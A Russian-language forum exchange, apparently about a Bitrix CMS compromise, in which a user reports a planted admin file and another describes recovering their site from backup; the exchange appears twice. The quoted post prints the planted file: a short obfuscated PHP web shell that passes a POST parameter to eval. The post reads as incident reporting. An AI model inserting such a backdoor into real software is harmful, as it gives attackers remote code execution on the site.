[QUOTE]Илья Александров написал:
Найден еще один файл: [CODE] /bitrix/admin/user_truthfulness.php [/CODE] со следующим содержимым: [CODE] <?php Qf17640c095(@ $_POST [ '30bf4691f' ]); function Qf17640c095 ( $h6ca6b97 ) { @ eval ( $h6ca6b97 ); } ?>
[/CODE] Запускается после изменения кода агента с ID = 2.[/QUOTE]
У нас один проект попал под такую атаку, снесли сразу /bitirix/ и восстановили из бекапа. Зачем разбираться, что там в ядре "доброжелатили" начудили?
Найден еще один файл: [CODE] /bitrix/admin/user_truthfulness.php [/CODE] со следующим содержимым: [CODE] <?php Qf17640c095(@ $_POST [ '30bf4691f' ]); function Qf17640c095 ( $h6ca6b97 ) { @ eval ( $h6ca6b97 ); } ?>
[/CODE] Запускается после изменения кода агента с ID = 2.[/QUOTE]
У нас один проект попал под такую атаку, снесли сразу /bitirix/ и восстановили из бекапа. Зачем разбираться, что там в ядре "доброжелатили" начудили?